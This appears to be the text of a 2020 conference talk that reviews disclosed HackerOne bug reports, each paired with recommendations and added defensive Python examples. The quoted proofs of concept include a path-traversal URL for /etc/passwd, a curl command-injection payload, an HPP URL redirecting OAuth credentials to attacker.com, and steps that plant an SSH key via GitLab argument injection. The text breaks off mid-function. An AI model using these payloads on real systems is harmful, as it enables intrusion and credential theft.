Watch How The Giants Fall
John Melton
CodeMash 2020
Me
• Director, Product Security & OWASP guy
• twitter: _jtmelton
• github: jtmelton
• email: jtmelton@gmail.com
Agenda
• intro
• for each bug
• understand issue
• understand fix
• pointers to helpful tools
• wrap-up
Intro
• Security bugs are just bugs
• There are many types (714 weaknesses in CWE across 237 categories)
• They go by many names (frustratingly inconsistent)
• There is a wide range of complexity
• There is no such thing as a “top 10” for you (see ecological fallacy)
A few bugs …
• Account Takeover
• Direct Object Reference
• XXE
• XSS
• RCE
• OS Command Injection
• Subdomain Takeover
• CSRF
• Sql Injection
• Insecure 3rd party libraries
• Missing Access Control
• SSRF
• Parameter Pollution
• Privilege Escalation
• Insecure Configuration
• Deserialization
• Authentication Bypass
• Hardcoded Password
0 / 22
Insecure 3rd Party Libraries
https://hackerone.com/reports/248116
Insecure 3rd Party Libraries
“One of the DoD applications uses a java library which is vulnerable to expression language injection. Using only a URL I was able to inject java code. I made a simple PoC that requests a name resolution to a DNS server.
The application at https://███ uses Primefaces version 5.3 which is vulnerable to Expression Language injection through DynamicContent generator.”
Insecure 3rd Party Libraries
“With the code attached generate the payload encrypted with the default key "primefaces". With the payload from #1, send a GET request using curl (curl -vk https://████/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=<YOUR_PAYLOAD_HERE>)”
Insecure 3rd Party Libraries
“You will receive a name resolution request for remoteMalJarUrl from the DoD application. We could use this DNS request to exfiltrate data from the server. And as I said, theoretically I could also delete files from the server using the File class.”
Insecure 3rd Party Libraries
Recommendations:
1. Update your libraries regularly! Even use auto-updaters where possible (requires test confidence)
2. Scan for known vulnerabilities (OWASP Dependency Check, Dependency Track)
3. Build a BOM (Dependency Track)
1 / 22
Privilege Escalation
https://hackerone.com/reports/694181
Privilege Escalation
“Because of the lack of security, an attacker will be able to remove the original log file and replace it with a symlink to another file.
After finishing the job, the host machine copies the file from the docker container.
Because the original log file has been removed, the host machine will copy the symlink file.
But the problem is it doesn't copy the linked file in the container, it copies the linked file on the HOST MACHINE.”
Privilege Escalation (screenshot slides)
Privilege Escalation
Recommendations:
• “We're currently in the process of deploying a remediation involving removing symlinks from data uploaded from the worker.”
• Sandbox sensitive processes
• Monitor logs
• Understand technology choices (docker reading from host)
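The vendor's remediation above is to strip symlinks from worker output before the host touches it. The following is an added example (not code from the report or the vendor) of that check: it refuses to copy an artifact tree if any entry is a symlink, because a link planted inside the container is resolved on whichever machine opens it. The worker directory and file names are constructed for the demo.

```python
import os
import tempfile
from pathlib import Path


def find_symlinks(root):
    """Return the relative paths of every symlink (file or directory) under root.

    os.walk lists a symlink to a directory in dirnames but, with
    followlinks=False, never descends into it, so each link is seen once.
    """
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                found.append(os.path.relpath(full, root))
    return sorted(found)


def safe_copy_tree(src, dst):
    """Copy src into dst only if it contains no symlinks; return the copied relative paths.

    Raises ValueError instead of copying when a link is present, so a link
    planted by a job can never make the host read one of its own files.
    """
    links = find_symlinks(src)
    if links:
        raise ValueError("refusing to copy, symlinks found: %s" % links)
    copied = []
    for dirpath, _dirnames, filenames in os.walk(src, followlinks=False):
        rel_dir = os.path.relpath(dirpath, src)
        out_dir = dst if rel_dir == "." else os.path.join(dst, rel_dir)
        os.makedirs(out_dir, exist_ok=True)
        for name in filenames:
            with open(os.path.join(dirpath, name), "rb") as f_in:
                data = f_in.read()
            with open(os.path.join(out_dir, name), "wb") as f_out:
                f_out.write(data)
            copied.append(os.path.normpath(os.path.join(rel_dir, name)))
    return sorted(copied)


def demo(plant_symlink):
    """Constructed scenario: a worker output directory whose log file has been
    replaced by a symlink (when plant_symlink is True). Returns 'copied' or 'rejected'."""
    with tempfile.TemporaryDirectory() as tmp:
        worker = Path(tmp, "worker_output")
        worker.mkdir()
        (worker / "job.log").write_text("job finished\n")
        if plant_symlink:
            os.remove(worker / "job.log")
            # The target is resolved on whichever machine opens the link, i.e. the host.
            os.symlink("/etc/hostname", worker / "job.log")
        try:
            safe_copy_tree(str(worker), str(Path(tmp, "host_copy")))
            return "copied"
        except ValueError:
            return "rejected"


if __name__ == "__main__":
    print(demo(plant_symlink=False), demo(plant_symlink=True))
```

Rejecting the whole artifact is deliberate: silently dropping the link would let a job hide the fact that it tried, and logging the refusal gives the monitoring the slide asks for.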
???
$2,000
2 / 22
Cross-Site Request Forgery (CSRF)
https://hackerone.com/reports/630146
CSRF
“The POST request to /ocs/v2.php/apps/provisioning_api/api/v1/config/apps/core/encryption_enabled is missing a unique token, so that if an attacker can trick an admin user with an active session to visit an attacker controlled website, he/she can control the core application setting "encryption_enabled"”
CSRF
curl -i -s -k -X $'POST' -H $'Host: <nextcloud_server>' -H $'Proxy-Connection: keep-alive' -H $'Content-Length: 10' -H $'Accept: */*' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'OCS-APIREQUEST: true' -H $'Origin: http://<nextcloud_server>' -H $'User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36' -H $'X-Requested-With: XMLHttpRequest' -H $'requesttoken: sSxMouPIwzbpI5ErZycXzGqCsOzacYntRk18kUOwin4=:gBUhzYWys3qhEqNPFE1frx663pq9BdjaKiwz5zfo6y4=' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9 ' -H $'Cookie: <cookies>' --data-binary $'value=no\x0d\x0a' $'http://<nextcloud_server>/ocs/v2.php/apps/provisioning_api/api/v1/config/apps/core/encryption_enabled'
CSRF
“We are going to prevent this, but since you can not abuse it really without being an admin, and at that point you can also revert our patch, it's not eligible for a bounty.”
CSRF
Recommendations:
• Use modern frameworks, enabling CSRF config if necessary
• OWASP CSRF Cheat Sheet
• OWASP CSRFGuard
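The missing piece in the report is a per-session token that a cross-site page cannot read. As an added example (not Nextcloud's code, and not from the report), the handler below implements a synchronizer token bound to the session with an HMAC and, as a second layer, refuses requests whose Origin header is not the site's own. The request shape, the session id and the origin names are constructed.

```python
import hashlib
import hmac
import secrets

# Assumed per-deployment secret; in production it comes from a secret store, not source.
SERVER_SECRET = secrets.token_bytes(32)
ALLOWED_ORIGINS = {"https://nextcloud.example"}  # constructed: the application's own origin


def issue_token(session_id):
    """Synchronizer token: random nonce plus an HMAC that binds it to the session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, ("%s:%s" % (session_id, nonce)).encode(), hashlib.sha256).hexdigest()
    return "%s:%s" % (nonce, mac)


def verify_token(session_id, token):
    nonce, _, mac = token.partition(":")
    if not nonce or not mac:
        return False
    expected = hmac.new(SERVER_SECRET, ("%s:%s" % (session_id, nonce)).encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_config_update(request, settings):
    """State-changing handler for .../config/apps/core/encryption_enabled.

    request is a constructed dict with method, headers, cookies and form. The
    session cookie identifies the admin; the form token must match that session,
    and if the browser sent an Origin header it must be our own origin.
    """
    if request["method"] != "POST":
        return 405, "method not allowed"
    session_id = request["cookies"].get("session")
    if not session_id:
        return 401, "no session"
    origin = request["headers"].get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return 403, "cross-origin request refused"
    if not verify_token(session_id, request["form"].get("requesttoken", "")):
        return 403, "missing or invalid CSRF token"
    settings["encryption_enabled"] = request["form"].get("value") == "yes"
    return 200, "ok"


def simulate():
    """Constructed exchange: one legitimate request and two forged from another site
    (with and without an Origin header). Returns the status codes and final settings."""
    settings = {"encryption_enabled": True}
    session = "admin-session-1"
    token = issue_token(session)
    legit = {"method": "POST", "headers": {"Origin": "https://nextcloud.example"},
             "cookies": {"session": session}, "form": {"value": "no", "requesttoken": token}}
    # The victim's browser attaches the session cookie automatically; the attacker's
    # page cannot read the token, so the forged form has none.
    forged = {"method": "POST", "headers": {"Origin": "https://attacker.example"},
              "cookies": {"session": session}, "form": {"value": "no"}}
    forged_no_origin = {"method": "POST", "headers": {},
                        "cookies": {"session": session}, "form": {"value": "no"}}
    return {"legit": handle_config_update(legit, settings)[0],
            "forged": handle_config_update(forged, settings)[0],
            "forged_no_origin": handle_config_update(forged_no_origin, settings)[0],
            "settings": settings}
```

The Origin check alone is not enough (older clients omit the header, which is why a missing Origin falls through to the token check rather than being accepted), and the token alone is what the report asked for; together they are what a framework's CSRF middleware gives you for free.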
???
3 / 22
Server-Side Request Forgery (SSRF)
https://hackerone.com/reports/198690
SSRF
“By sending a malformed HTTP request to alerts.newrelic.com, it's possible to trick that server into routing the request to an arbitrary location. This can be exploited by an internet based attacker to access internal services - doing a quick scan of █████████ I was able to access █████ etc.”
SSRF (screenshot slides)
SSRF
“This code may look faultless - it takes the user-supplied URL, replaces the domain with the hard-coded backend server's address, and passes it along. Unfortunately the Apache HttpComponents server library failed to require that paths start with '/'. This meant that when I sent the following request: ”
The code above rewrote this request as http://public-backend@burp-collaborator.net/ and routed the request to burp-collaborator.net.
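The rewrite described above goes wrong because a request target that does not start with '/' is glued straight onto the backend host, so the host name becomes the userinfo part of a URL whose real host is attacker-chosen. The following added example (not the New Relic code or the report's) shows the naive concatenation beside a rewrite that insists on an origin-form target and re-parses the result; "public-backend" stands in for the hard-coded backend address.

```python
from urllib.parse import urlsplit, urlunsplit

BACKEND_HOST = "public-backend"  # constructed stand-in for the hard-coded internal backend


def rewrite_naive(request_target):
    """Vulnerable: the backend URL is concatenated with whatever target the client sent.
    A target of '@burp-collaborator.net/' turns 'public-backend' into userinfo."""
    return "http://" + BACKEND_HOST + request_target


def rewrite_strict(request_target):
    """Hardened: accept only origin-form targets and rebuild the URL from parts."""
    if not request_target.startswith("/") or request_target.startswith("//"):
        raise ValueError("request target must be an absolute path starting with a single '/'")
    parts = urlsplit(request_target)
    if parts.scheme or parts.netloc:
        raise ValueError("request target must not carry a scheme or authority")
    out = urlunsplit(("http", BACKEND_HOST, parts.path, parts.query, ""))
    # Belt and braces: re-parse the result and confirm the host we will connect to.
    if urlsplit(out).hostname != BACKEND_HOST:
        raise ValueError("rewritten URL does not point at the backend")
    return out


def destination_host(url):
    """The host an HTTP client library would actually connect to for this URL."""
    return urlsplit(url).hostname


def strict_rejects(request_target):
    try:
        rewrite_strict(request_target)
        return False
    except ValueError:
        return True
```

Note the final re-parse: it catches any future path-handling quirk in the library you build the URL with, which is exactly the class of bug the report found in HttpComponents.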
SSRF (screenshot slides)
SSRF
Recommendations:
• OWASP Injection Prevention Cheat Sheet
• Strict input validation
• Map commands if possible (3 -> ping)
• Encode output parameters
???
4 / 22
File Disclosure
https://hackerone.com/reports/671749
File Disclosure
“CVE-2019-11510 is a file disclosure due to some normalization issues in pulse secure. I was able to reproduce this by grabbing /etc/passwd.
https://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#”
File Disclosure
“The file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear context passwords and usernames, when a user logs in from here we can then access the Pulse secure instance.”
File Disclosure
Recommendations:
• When doing file operations, always start with a secure prefix
• Use whitelisted options where possible
• Normalize (canonicalize) input otherwise, being careful to do full input validation (length, type, encoding, semantic value, etc.)
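The three recommendations above (secure prefix, canonicalize, validate the encoding) combine into one check. This added example, which is not Pulse Secure's code, decodes the path exactly once, normalizes it, and requires the result to remain under a fixed document root; only the path component of the URL takes part, so the query-string decoy in the report's URL cannot influence which file is chosen. The root /srv/www is an assumption.

```python
import posixpath
from urllib.parse import urlsplit, unquote

WEB_ROOT = "/srv/www"  # assumed document root (constructed)


def canonical_path(root, raw_path):
    """Decode once, normalize, and require the result to stay under root.

    posixpath.normpath keeps the check deterministic offline; on a live server use
    os.path.realpath as well so symlinks inside root are resolved before the compare.
    """
    decoded = unquote(raw_path)
    if unquote(decoded) != decoded:
        raise ValueError("double-encoded path")
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    root = posixpath.normpath(root)
    # lstrip('/') so an absolute client path cannot replace the root during join
    canon = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if canon != root and not canon.startswith(root + "/"):
        raise ValueError("path escapes document root: " + canon)
    return canon


def resolve_request(url, root=WEB_ROOT):
    """Only the path component selects a file; query and fragment are ignored."""
    return canonical_path(root, urlsplit(url).path)


def is_rejected(url, root=WEB_ROOT):
    try:
        resolve_request(url, root)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(resolve_request("https://h/static/app.js"))
```

The order matters: decoding after normalizing would let an encoded "%2e%2e" survive the ".." check, which is the "normalization issues" the report refers to.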
???
$0
5 / 22
Insufficient Authorization
https://hackerone.com/reports/676976
Insufficient Authorization
“For public projects, GitLab allows restricting CI pipelines to project members only (public pipelines disabled). However, in this case, the merge request widget still renders the scanning report results, which are the outcome of a CI pipeline.
Unauthorized users have access to critical information like the container scanning or dependency scanning report, and thus have a lot of insight into an application. By knowing the found (or still existing) vulnerabilities, they could attack the target application.”
Insufficient Authorization
“Create a public project, restrict CI pipeline access to project members, and disable public pipelines
Push a new branch and add a .gitlab-ci.yml file, and create a merge request with those changes
As an unauthorized user, visit the pages https://example.gitlab.com/<namespace>/<public-project-name>/merge_requests/1/merge_requests/1/container_scanning_reports and https://example.gitlab.com/<namespace>/<public-project-name>/merge_requests/1/merge_requests/1/dependency_scanning_reports”
Insufficient Authorization
Recommendations:
• Ensure your access control decision is appropriate for the content
• OWASP Access Control Cheat Sheet
• Appropriate logging and monitoring
???
$3,000
6 / 22
Subdomain Takeover
https://hackerone.com/reports/661751
https://hackerone.com/reports/665398
Subdomain Takeover
1. Buy a domain at a hosting site (123xyz.hosting.com)
2. Get a vanity domain (2017event.mysite.com)
3. Create cname record for vanity -> hosting
4. Hosting site expires (not needed anymore), but cname is still there
5. Attacker registers hosting domain
6. Vanity domain now points to attacker site
Subdomain Takeover
“The dangling CNAME record of datacafe-cert.starbucks.com is pointing to s00397nasv101-datacafe-cert.azurewebsites.net which was not claimed by you. I registered a service with this name and therefore was able to take over the subdomain. Every attacker doing this has afterwards full control over the contents served on this subdomain.”
Subdomain Takeover
1. Using dig, I was able to determine that the subdomain 'd02-1-ag.productioncontroller.starbucks.com' was vulnerable to takeover. The record showed status: NXDOMAIN and was pointing to the CNAME: 3edbac0a-5c43-428a-b451-a5eb268f888b.cloudapp.net.
2. Using this information, I was able to create a new Azure Cloud Service with the name '3edbac0a-5c43-428a-b451-a5eb268f888b'. This would resolve to the CNAME record mentioned above.
3. I then crafted a website and uploaded it to the cloud service using this as a guide: https://docs.microsoft.com/en-us/azure/cloud-services/cloud-services-how-to-create-deploy-portal.
4. I was then able to view the uploaded site at http://d02-1-ag.productioncontroller.starbucks.com
Subdomain Takeover
Recommendations:
• Actively manage network infrastructure
• Run specialty subdomain scanning tools against yourself
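"Run subdomain scanning tools against yourself" amounts to the six-step sequence above run in reverse: walk your own zone, follow every CNAME to its final target, and flag targets that no longer resolve, especially on hosting suffixes where anyone can claim the name. This added example (not one of the real scanners, and not from the reports) does that over a constructed zone table and a constructed resolver so it runs offline; the sample records are modelled on the ones quoted above, and system_resolver is included for use against live DNS.

```python
import socket

# Suffixes of hosting services where an unclaimed name can be registered by anyone.
# The two listed are the ones that appear in the reports above; extend per your providers.
TAKEOVER_PRONE_SUFFIXES = (".azurewebsites.net", ".cloudapp.net")


def system_resolver(name):
    """Resolve with the OS resolver; None when the name does not resolve (NXDOMAIN or similar)."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def dangling_cnames(zone, resolve):
    """zone maps owner -> (rtype, rdata). Returns [(owner, final_target, reason)] for
    every CNAME whose final target does not resolve, following chains inside the zone first."""
    findings = []
    for owner, (rtype, rdata) in zone.items():
        if rtype != "CNAME":
            continue
        target, hops = rdata, 0
        while target in zone and zone[target][0] == "CNAME" and hops < 8:
            target = zone[target][1]
            hops += 1
        if resolve(target) is None:
            reason = "claimable" if target.endswith(TAKEOVER_PRONE_SUFFIXES) else "nxdomain"
            findings.append((owner, target, reason))
    return findings


# Constructed zone and resolver answers, modelled on the records quoted above.
SAMPLE_ZONE = {
    "datacafe-cert.starbucks.com": ("CNAME", "s00397nasv101-datacafe-cert.azurewebsites.net"),
    "d02-1-ag.productioncontroller.starbucks.com": ("CNAME", "3edbac0a-5c43-428a-b451-a5eb268f888b.cloudapp.net"),
    "www.example-zone.test": ("CNAME", "edge.example-zone.test"),
    "edge.example-zone.test": ("CNAME", "cdn.provider.test"),
    "api.example-zone.test": ("A", "203.0.113.10"),
}
SAMPLE_ANSWERS = {"cdn.provider.test": "203.0.113.20"}  # every other name: NXDOMAIN


def sample_resolver(name):
    return SAMPLE_ANSWERS.get(name)


def run_sample():
    return dangling_cnames(SAMPLE_ZONE, sample_resolver)


if __name__ == "__main__":
    for owner, target, reason in run_sample():
        print("%s -> %s (%s)" % (owner, target, reason))
```

Schedule this from the same place that deprovisions hosting, so a record is flagged the day its target disappears rather than when a researcher finds it.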
???
$2,000
$2,000
7 / 22
Web Cache Poisoning
https://hackerone.com/reports/622122
https://portswigger.net/research/practical-web-cache-poisoning
Web Cache Poisoning
“On https://paypal.com/, you could impact core functionality by using an invalid Transfer-Encoding header to replace JavaScript files from www.paypalobjects.com with the message '501 Not Implemented'. This was patched and awarded a $9,700 bounty.”
Web Cache Poisoning (screenshot slide)
Web Cache Poisoning
When XSSing yourself is not just XSSing yourself!
Web Cache Poisoning
Recommendations:
• Take significant care with web caches
• Be careful about cache keys and what they’re used for
???
$9,700
8 / 22
Insecure Configuration
https://hackerone.com/reports/415272
Insecure Configuration
“The slack binary from the Linux desktop application is not a position independent executable:
$ file usr/lib/slack/slack
usr/lib/slack/slack: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, stripped
(pie executables report either "LSB shared object" or "LSB pie executable".)”
Insecure Configuration
“Position independent executables are required for full ASLR support on Linux. Non-pie binaries are loaded to a fixed location, thus allowing ROP attacks.
I'm aware that technically this is not a vulnerability, but a lack of a hardening feature. However given that ASLR is generally considered standard practice these days and that lack of it can mean very simple bugs can directly lead to code execution I think it deserves to be fixed.”
Insecure Configuration
“A simple memory corruption bug like a buffer overflow can easily lead to a remote code execution bug. With ASLR these bugs are much harder and sometimes impossible to exploit.”
Insecure Configuration
Recommendations:
• Make sure to enable secure default configurations
• Use linters and scanners looking for bad configs (language / framework specific usually)
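The "LSB executable" versus "LSB pie executable" distinction that file(1) prints comes from one field in the ELF header: e_type is ET_EXEC (2) for a fixed-address binary and ET_DYN (3) for a PIE (and for shared libraries). This added example, which is not Slack's code or the report's, reads that field so a build pipeline can reject non-PIE release binaries; the 64-byte headers it checks are constructed, with only the inspected fields filled in.

```python
import struct

ET_EXEC, ET_DYN = 2, 3  # e_type values from the ELF specification


def elf_type(header):
    """Return e_type from the first bytes of an ELF file; raises ValueError if not ELF."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    endian = "<" if header[5] == 1 else ">"   # EI_DATA: 1 = little-endian, 2 = big-endian
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return e_type


def is_pie(header):
    """PIE executables are ET_DYN, the same type as shared libraries. For a file you
    know is a program, ET_EXEC means a fixed load address: no ASLR for its own text."""
    return elf_type(header) == ET_DYN


def check_file(path):
    """True if the executable at path is position independent."""
    with open(path, "rb") as f:
        return is_pie(f.read(64))


def fake_header(e_type, little_endian=True):
    """Constructed 64-byte ELF64 header with only e_ident, e_type and e_machine populated."""
    ident = b"\x7fELF" + bytes([2, 1 if little_endian else 2, 1]) + bytes(9)  # class, data, version
    fmt = "<HH" if little_endian else ">HH"
    return ident + struct.pack(fmt, e_type, 0x3E) + bytes(64 - 20)            # 0x3E = EM_X86_64


def not_elf(header):
    try:
        elf_type(header)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, "pie" if check_file(p) else "NOT pie")
```

This is the kind of one-line check the "linters and scanners" bullet means: the compiler flag (-fPIE/-pie) is the fix, the header check is how you notice it was dropped.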
???
$100
9 / 22
Insecure Configuration
https://hackerone.com/reports/268382
Insecure Configuration
“Nginx misconfiguration leading to direct PHP source code download
data.gov uses nginx as the web server. Due to the server misconfiguration, instead of processing the file, the .php source code is sent to the client requesting it from the direct url.”
Insecure Configuration
“An attacker can download any .php file on the web, leading to a huge amount of information about the server. data.gov implements saml (open-source); the config.php file in the saml config folder can be downloaded by a direct url request, and it contains sensitive information such as: auth.adminpassword, technical contact email, and (possibly) database password.”
Insecure Configuration
Recommendations:
• Make sure to enable secure default configurations
• Use linters and scanners looking for bad configs (language / framework specific usually)
• If there’s a website, use active DAST scanners (ZAP, Burp, Arachni, etc.)
???
$750
10 / 22
HTTP Parameter Pollution (HPP)
https://hackerone.com/reports/114169
HPP
“I would like to report an issue on Digits web authentication which allows attackers to retrieve the OAuth credential data of an application victims authorized.”
“…the login page has 2 parameters, consumer_key and host. The former identifies which app a user wants to authenticate, and the latter specifies which domain the OAuth credential data is sent to after authentication. In order to prevent other websites from pretending to be the application, the host parameter will be validated to see if it matches the registered domain of the app. ”
HPP
https://www.digits.com/login?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3A%2F%2Fwww.periscope.tv
host=https://www.periscope.tv matches the registered domain
If we modify it:
https://www.digits.com/login?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3A%2F%2Fattacker.com
host=https://attacker.com does not match the registered domain, thus the page will show an error.
HPP
However, the validation can be bypassed with HPP (HTTP Parameter Pollution). If we supply multiple host parameters, the validation will only compare the first one but the last one is used in the transfer step instead.
https://www.digits.com/login?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3A%2F%2Fwww.periscope.tv&host=https%3A%2F%2Fattacker.com
The first host (host=https://www.periscope.tv) is validated but not the second one. After authentication the second host (host=https://attacker.com) is used as the transfer origin.
HPP (screenshot slides)
HPP
Recommendations:
• Understand the way your language / framework / server handles multiple parameters of the same name
• Understand server and client side HPP
• Input validation for HPP (reject/report)
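The bug is two pieces of code reading the same parameter with different "which one wins" rules. The added example below (not Digits' code) mirrors that with Python's parse_qs, which returns every value as a list: the vulnerable version validates element 0 and hands element -1 to the redirect, the fixed version rejects any request where consumer_key or host appears more than once before validating the single value. The registered-host table is constructed; the URLs and key are the ones on the slide.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed registry: consumer_key -> the host the application registered.
REGISTERED = {"9I4iINIyd0R01qEPEwT9IC6RE": "https://www.periscope.tv"}


def transfer_host_vulnerable(login_url):
    """Mirrors the reported bug: the first host is validated, the last one is used."""
    q = parse_qs(urlsplit(login_url).query)
    key = q["consumer_key"][0]
    if q["host"][0] != REGISTERED.get(key):
        raise ValueError("host does not match registered domain")
    return q["host"][-1]  # the transfer step reads the parameter again and gets the last value


def transfer_host_fixed(login_url):
    """Reject duplicates outright, then validate the one value that will actually be used."""
    q = parse_qs(urlsplit(login_url).query, keep_blank_values=True)
    for name in ("consumer_key", "host"):
        if len(q.get(name, [])) != 1:
            raise ValueError("expected exactly one '%s' parameter" % name)
    key, host = q["consumer_key"][0], q["host"][0]
    if host != REGISTERED.get(key):
        raise ValueError("host does not match registered domain")
    return host


CLEAN = ("https://www.digits.com/login?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE"
         "&host=https%3A%2F%2Fwww.periscope.tv")
POLLUTED = CLEAN + "&host=https%3A%2F%2Fattacker.com"


def rejects(handler, url):
    try:
        handler(url)
        return False
    except ValueError:
        return True
```

Rejecting (and logging) duplicates rather than picking one is the "reject/report" bullet: a browser-driven login flow never legitimately sends the same parameter twice, so a duplicate is itself a signal worth alerting on.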
???
$2,520
11 / 22
Command Injection
https://hackerone.com/reports/688270
Command Injection
“OS Command Injection in Nexus Repository Manager 2.x (bypass CVE-2019-5475)”
“The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data are vulnerable, such as the Yum Configuration Capability. ”
Command Injection
Take a look at the patch for CVE-2019-5475
https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84
The getCleanCommand method is not completely filtered and can still be bypassed.
Command Injection
Steps To Reproduce:
1. Navigate to "Capabilities" in Nexus Repository Manager.
2. Edit or create a new Yum: Configuration capability
3. Set path of "createrepo" or "mergerepo" to an OS command (e.g. /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo)
Command Injection
Recommendations:
• Validate input aggressively
• OWASP Input Validation Cheat Sheet
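The bypass above worked because the fix filtered the configured string and then still executed it through a command line. The added example below (not Nexus code) takes the other route: the administrator-configured tool path must equal one of a small allow-list of absolute executables, the repository directory is checked separately, and both become individual argv entries with no shell, so there is nothing for ${IFS} or "||" to act on. The allowed paths and the Nexus-style directory are assumptions.

```python
import os
import subprocess

# Allow-list of absolute tool paths an administrator may configure (constructed for this example).
ALLOWED_TOOLS = {
    "createrepo": ("/usr/bin/createrepo", "/usr/bin/createrepo_c"),
    "mergerepo": ("/usr/bin/mergerepo", "/usr/bin/mergerepo_c"),
}


def validate_tool_path(tool, configured):
    """The configured value must be exactly one allowed path: no extra tokens, no
    metacharacters, and no shell later on that could re-interpret them."""
    configured = configured.strip()
    if configured not in ALLOWED_TOOLS.get(tool, ()):
        raise ValueError("%s path %r is not an allowed executable" % (tool, configured))
    return configured


def validate_repo_dir(repo_dir):
    """Absolute path only, and never something that could be read as an option."""
    if not os.path.isabs(repo_dir) or repo_dir.startswith("-"):
        raise ValueError("repository directory must be an absolute path")
    return os.path.normpath(repo_dir)


def build_argv(tool, configured_path, repo_dir):
    """argv list for subprocess: each value is exactly one argument, never a shell string."""
    return [validate_tool_path(tool, configured_path), validate_repo_dir(repo_dir)]


def run_tool(tool, configured_path, repo_dir):
    """Execute the validated command without a shell; raises on a non-zero exit."""
    argv = build_argv(tool, configured_path, repo_dir)
    return subprocess.run(argv, shell=False, check=True, capture_output=True, text=True)


def is_rejected(tool, configured_path, repo_dir="/var/nexus/yum/repo"):
    try:
        build_argv(tool, configured_path, repo_dir)
        return False
    except ValueError:
        return True
```

Compare this with a blocklist approach: every character you forget to block is a bypass, whereas with an allow-list the reported payload is rejected for the simple reason that it is not one of two strings.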
???
$0
12 / 22
Hardcoded Key
https://hackerone.com/reports/716292
Hardcoded Key
“While going through Github search I discovered a public repository which contains a JumpCloud API Key of Starbucks.”
Hardcoded Key
POC:
List systems
curl -H "x-api-key: ████████" "https://console.jumpcloud.com/api/systems"
There are multiple AWS instances present
curl -H "x-api-key: █████" "https://console.jumpcloud.com/api/systemusers"
SSO Applications
curl -H "x-api-key: ██████" "https://console.jumpcloud.com/api/applications"
AWS login SAML config is present. This would lead to AWS account takeover
Hardcoded Key
This issue's impact is critical, as through this API anyone could:
Execute commands on systems https://docs.jumpcloud.com/1.0/commands/create-a-command
Add/Remove users which have access to internal systems
AWS Account Takeover
Hardcoded Key
Recommendations:
• Don’t hardcode keys
• Use HSM, Hashicorp Vault, etc.
• Run scanning tools looking for hardcoded passwords and keys (git-secrets, gitleaks, gitrob, trufflehog)
???
$4,000
13 / 22
Remote Code Execution (RCE)
https://hackerone.com/reports/658013
RCE
1. Create a new wiki page called "page" with the commit message "controlled content"
2. Search for the wiki blob via the Search API, with the injected ref flag: curl --header "PRIVATE-TOKEN: $TOKEN" 'http://gitlab-vm.local/api/v4/projects/5/search?scope=wiki_blobs&search=page&ref=--output=/tmp/file'
3. See that the file has been created:
git@gitlab-vm:~$ cat /tmp/file
commit f00f9538d29b176e9dfb2eb1bfe1eab190cad3d9
Author: Administrator <admin@example.com>
Date: Wed Jul 24 13:08:51 2019 +0000
controlled content
RCE
1. Create a new rsa key
2. Create a new wiki page setting the commit message to the rsa public key
3. Run the Search API with ref=--output=/var/opt/gitlab/.ssh/authorized_keys
4. ssh into gitlab using the created key:
$ ssh git@gitlab-vm.local -i gitlab
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-70-generic x86_64)
$ id
uid=998(git) gid=998(git) groups=998(git)
$ cat /var/opt/gitlab/.ssh/authorized_keys
commit 00c8e52996654d02bcbdba47dc25ee73671cbfd6
Author: Administrator <admin@example.com>
Date: Wed Jul 24 12:56:23 2019 +0000
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxsqkWZobL5DBOnM3rtE7ZDP4d9v0lABJRGJbovHHTNY2iH3x3pjjerPfLDO21Gkyfzn4J+x6O6GleMAB5nxnZRH7E44khfW6Ldql29Rv2Q/IYCsBSKxGT6RCOFusoRi1uHlQmexIh4gZkmPeFfDLTy70Xv3FpPLfKE/EiVOjuEtY9JUC4MVlPHaTzZ2HE4sZT5tvcm9YtSpjT2v0SMR8uCXcKMAx4Tsu/Un2N5UziXgtRF+vD0fRhNyKIkOtULwBgWkL5RE71vYbxOhviqTAld7r70TIWSzSUHcUewbMS5XcEdBwl3XI/9qzo+jOA0Ulf2bkkROpELBoHwfLdpu9p will@MacBook-Pro.local
RCE
Recommendations:
• Input Validation
• Lock down anything with files closely
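The ref parameter above is not shell injection: it is argument injection, a value that starts with "-" being handed to git where git expects a revision, so git reads it as --output. The added example below (not GitLab's code; the git log invocation is an assumed stand-in for the search) shows the input validation the recommendation calls for: refuse refs that could parse as options, apply a conservative subset of the rules git check-ref-format enforces, and always place "--" between revisions and paths.

```python
import re
import subprocess

# Characters and sequences git never allows in a ref name (a subset of check-ref-format).
_FORBIDDEN = re.compile(r"[\x00-\x20\x7f~^:?*\[\\]|\.\.|@\{|//")


def validate_ref(ref):
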